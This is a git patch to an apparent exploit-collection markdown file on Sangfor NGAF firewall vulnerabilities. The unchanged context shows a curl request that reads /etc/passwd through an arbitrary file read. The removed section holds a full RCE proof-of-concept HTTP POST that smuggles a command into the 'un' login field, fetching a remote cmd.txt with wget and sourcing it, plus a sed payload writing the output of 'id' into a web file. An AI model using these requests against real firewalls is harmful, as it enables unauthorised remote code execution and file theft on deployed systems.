From 8b5b0120d73d0260c0895f06b2d0c404c2375312 Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Sat, 21 Oct 2023 20:42:24 +0800
Subject: [PATCH] =?UTF-8?q?Update=20=E6=B7=B1=E4=BF=A1=E6=9C=8D=E4=B8=8B?=
 =?UTF-8?q?=E4=B8=80=E4=BB=A3=E9=98=B2=E7=81=AB=E5=A2=99NGAF=E4=BB=BB?=
 =?UTF-8?q?=E6=84=8F=E6=96=87=E4=BB=B6=E8=AF=BB=E5=8F=96=E6=BC=8F=E6=B4=9E?=
 =?UTF-8?q?.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 深信服下一代防火墙NGAF任意文件读取漏洞.md | 15 ---------------
 1 file changed, 15 deletions(-)

diff --git a/深信服下一代防火墙NGAF任意文件读取漏洞.md b/深信服下一代防火墙NGAF任意文件读取漏洞.md
index ba41792..ff1336f 100644
--- a/深信服下一代防火墙NGAF任意文件读取漏洞.md
+++ b/深信服下一代防火墙NGAF任意文件读取漏洞.md
@@ -16,19 +16,4 @@ curl --insecure  https://<host>:85/svpn_html/loadfile.php?file=/etc/./passwd -H
 ![](https://mmbiz.qpic.cn/sz_mmbiz_png/W3ujp2P7OjARkXD5FOjonOrfcK6Xr6QOVaCrI21fu9F1DcBPekwcPFBf8Q8vCrI4Qmiaia2YaMExoogwic2TSnNKQ/640?wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1)
 
 
-## 深信服下一代防火墙NGAF RCE漏洞
 
-```
-POST /LogInOut.php HTTP/1.1
-Host:
-Cookie: PHPSESSID=2e01d2ji93utnsb5abrcm780c2
-Content-Type: application/x-www-form-urlencoded; charset=UTF-8
-Connection: close
-Content-Length: 625
-
-type=logged&un=watchTowr;wget http://<host>/cmd.txt;source /virus/dcweb/webapps/cmd.txt&up=0f2df0a6f151e836c8ccd1c2ea3bfbdfb7bfa0d38d438942492bd8f28f3e92939319f932f2f2add6d0d484accdc4c28269b203c4dc77c1da941fa19dae017d44d6ea8cad2572e37c485a8ebcb4bdb510cc86420a50ae45ae07daf5fe9c40fe133f3806cd8f3158ee359766e8e19c9fbbf7e888bf0d7f3952f4d083bd17cd19eb960dadec2835f6f259616f5b2e5942d3a4d1754cbd69696fae60ef18358bf5782dd5ebf377f5642e0583e630660ccac241a615ae21bfc12852a32d0367a899eb010e5d1c33669fc2e9ea3a0ecbf078c22120196a115b4038288063bf99610d3d331acb53e5c8fbd14229a4abdff83cf075a7b97a9bb9dae3586f19256f4262d5&vericode=<correct captcha>
-
-```
-Cmd.txt 有效载荷：
-```sed -i s/Lock/"$(id)"/g /virus/dcweb/conf/lang/eng.utf8.lang.app.php```
-![](https://labs.watchtowr.com/content/images/2023/10/image-13.png)